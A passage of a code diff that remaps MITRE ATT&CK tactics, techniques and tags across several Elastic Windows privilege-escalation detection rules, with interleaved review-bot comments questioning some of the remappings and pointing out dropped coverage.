"production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -85,17 +85,7 @@ Audit Directory Service Changes (Success,Failure) ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Lateral Movement", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" 
@@ -121,41 +111,36 @@ any where host.os.type == "windows" and event.code in ("5136", "5145") and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.001" name = "Group Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/001/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/privilege_escalation_installertakeover.toml b/rules/windows/privilege_escalation_installertakeover.toml index 52bf1177ba3..6cdb156c937 100644 --- a/rules/windows/privilege_escalation_installertakeover.toml +++ b/rules/windows/privilege_escalation_installertakeover.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -143,14 +143,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.010" +name = "Services File Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/010/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml index 337b065f9c5..9091212979e 100644 --- a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml +++ b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/04/27" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,17 +58,7 @@ references = [ risk_score = 73 rule_id = "e4e31051-ee01-4307-a6ee-b21b186958f4" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Credential Access", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] type = "eql" query = ''' 
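Review bot: The new sub-technique looks like a loose fit: T1574.010 "Services File Permissions Weakness" describes replacing a service's binary through weak file permissions, whereas the InstallerFileTakeOver-style behaviour this rule's file name points at abuses Windows Installer file operations, which is closer to the T1068 mapping being removed (the EQL query is outside this hunk, so this is inferred from the name and the `process where ... event.type == "start"` hunk context). If the parent technique is what is wanted, dropping the `[[rule.threat.technique.subtechnique]]` block and keeping `id = "T1574"` alone avoids asserting a specific weakness the rule does not look for.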
@@ -89,31 +79,31 @@ sequence by winlog.computer_name with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1558" -name = "Steal or Forge Kerberos Tickets" -reference = "https://attack.mitre.org/techniques/T1558/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/privilege_escalation_lsa_auth_package.toml b/rules/windows/privilege_escalation_lsa_auth_package.toml index 24dcc87b0fe..f843c0bda36 100644 --- a/rules/windows/privilege_escalation_lsa_auth_package.toml +++ b/rules/windows/privilege_escalation_lsa_auth_package.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -19,16 +19,7 @@ name = "Potential LSA Authentication Package Abuse" risk_score = 47 rule_id = "e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -79,36 +70,36 @@ The Local Security Authority (LSA) in Windows manages authentication and securit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" - - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/windows/privilege_escalation_make_token_local.toml b/rules/windows/privilege_escalation_make_token_local.toml index 291c41803d3..95ae8823b78 100644 --- a/rules/windows/privilege_escalation_make_token_local.toml +++ b/rules/windows/privilege_escalation_make_token_local.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/04" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,14 +56,7 @@ setup = """## Setup Audit event 4624 is needed to trigger this rule. """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -86,10 +79,12 @@ authentication where [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" 
@@ -100,10 +95,30 @@ id = "T1134.003" name = "Make and Impersonate Token" reference = "https://attack.mitre.org/techniques/T1134/003/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.003" +name = "Make and Impersonate Token" +reference = "https://attack.mitre.org/techniques/T1134/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml b/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml index 8302d80474b..7647f482148 100644 --- a/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml +++ b/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["endpoint", "sentinel_one_cloud_funnel", "m365_defender", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -89,31 +89,13 @@ process where event.type == "start" and host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.007" -name = "Msiexec" -reference = "https://attack.mitre.org/techniques/T1218/007/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_named_pipe_impersonation.toml b/rules/windows/privilege_escalation_named_pipe_impersonation.toml index 17355c1cbf2..72f5e35f7c6 100644 --- a/rules/windows/privilege_escalation_named_pipe_impersonation.toml +++ b/rules/windows/privilege_escalation_named_pipe_impersonation.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -135,14 +135,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - 
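Review bot: Removing the Defense Evasion entry drops T1218.007 "Msiexec", the technique that names the very binary this rule is built around (per its file name and the `process where event.type == "start"` hunk context), leaving only the generic T1068. Several rules in this patch are narrowed to a single tactic the same way (exploit_cve_202238028, persistence_phantom_dll, krbrelayup_service_creation), so if the policy is now "primary tactic only" a sentence saying so in the PR description would save reviewers asking per file; if not, keeping a second `[[rule.threat]]` with `id = "TA0005"` and the T1218.007 sub-technique preserves the proxy-execution mapping.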
diff --git a/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml b/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml index ad3ad46e70b..c686464cf1d 100644 --- a/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml +++ b/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/15" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/06/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,14 +53,7 @@ references = ["https://www.elastic.co/pt/blog/how-attackers-abuse-access-token-m risk_score = 47 rule_id = "e468f3f6-7c4c-45bb-846a-053738b3fe5d" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" 
@@ -74,22 +67,39 @@ event.category:"authentication" and host.os.type:"windows" and winlog.logon.type [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/windows/privilege_escalation_persistence_phantom_dll.toml b/rules/windows/privilege_escalation_persistence_phantom_dll.toml index 4cc497eaafe..71a2d7cae7a 100644 --- a/rules/windows/privilege_escalation_persistence_phantom_dll.toml +++ b/rules/windows/privilege_escalation_persistence_phantom_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/01/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -75,17 +75,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" 
@@ -151,53 +141,36 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" - - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml index e4d788cb975..0b8fc7248da 100644 --- a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml +++ b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml 
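Review bot: Dropping the Defense Evasion entry leaves phantom DLL loading mapped only to Persistence and Privilege Escalation, although T1574/T1574.001 is also listed under Defense Evasion in ATT&CK. Removing the Masquerading/T1036.001 pairing may well be intended, but the tactic itself could be kept with the same T1574.001 technique, mirroring how the other two entries in this hunk are built. Worth confirming this was a deliberate coverage decision rather than a casualty of the reshuffle, since the preceding tags hunk removes `Tactic: Defense Evasion` as well.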
@@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/02/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -20,16 +20,7 @@ references = ["https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-gro risk_score = 47 rule_id = "8f3e91c7-d791-4704-80a1-42c160d7aa27" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -83,10 +74,12 @@ Port monitors and print processors are integral to Windows printing, managing da [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.010" name = "Port Monitors" @@ -97,18 +90,19 @@ id = "T1547.012" name = "Print Processors" reference = "https://attack.mitre.org/techniques/T1547/012/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.010" name = "Port Monitors" 
@@ -119,9 +113,7 @@ id = "T1547.012" name = "Print Processors" reference = "https://attack.mitre.org/techniques/T1547/012/" - - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_posh_token_impersonation.toml b/rules/windows/privilege_escalation_posh_token_impersonation.toml index 0d2a820a60c..1faa3f340cd 100644 --- a/rules/windows/privilege_escalation_posh_token_impersonation.toml +++ b/rules/windows/privilege_escalation_posh_token_impersonation.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/17" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -111,14 +111,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -162,44 +155,49 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] id = "T1134.001" name = "Token Impersonation/Theft" reference = "https://attack.mitre.org/techniques/T1134/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - [[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", 
diff --git a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml index 75067c258a1..d80c2c3760f 100644 --- a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml +++ b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/06" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,19 +66,7 @@ references = ["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34 risk_score = 47 rule_id = "c4818812-d44f-47be-aaef-4cfb2f9cc799" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -91,14 +79,18 @@ file where host.os.type == "windows" and event.type == "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml index c415ada0e36..c9ab8872997 100644 --- a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml +++ b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/05" integration = ["endpoint", "windows", "crowdstrike", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/10/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
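Review bot: Removing T1068 leaves this rule with a `Use Case: Vulnerability` tag and a CVE reference (both kept as context) but no exploitation-related ATT&CK mapping, and the file still sits under the `privilege_escalation_` prefix while no Privilege Escalation tactic remains. Either keep a second `[[rule.threat]]` entry with T1068 under TA0004 next to the new T1070.004/Defense Evasion entry, or adjust the use-case tag and filename so the metadata tells one story. The samaccountname_spoofing hunk drops T1068 the same way while keeping `Use Case: Vulnerability`, and suspicious_dnshostname_update drops T1068 too, though its tags are not in this view.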
@@ -63,20 +63,7 @@ references = ["https://cube0x0.github.io/Pocing-Beyond-DA/"] risk_score = 47 rule_id = "b66b7e2b-d50a-49b9-a6fc-3a383baedc6b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Elastic Endgame", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Crowdstrike", "Resources: Investigation Guide", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Elastic Endgame"] timestamp_override = "event.ingested" type = "eql" 
@@ -135,46 +122,56 @@ registry where host.os.type == "windows" and event.type == "change" and process. [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.011" name = "Services Registry Permissions Weakness" reference = "https://attack.mitre.org/techniques/T1574/011/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = "Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0004" +name = "Privilege Escalation" +reference = 
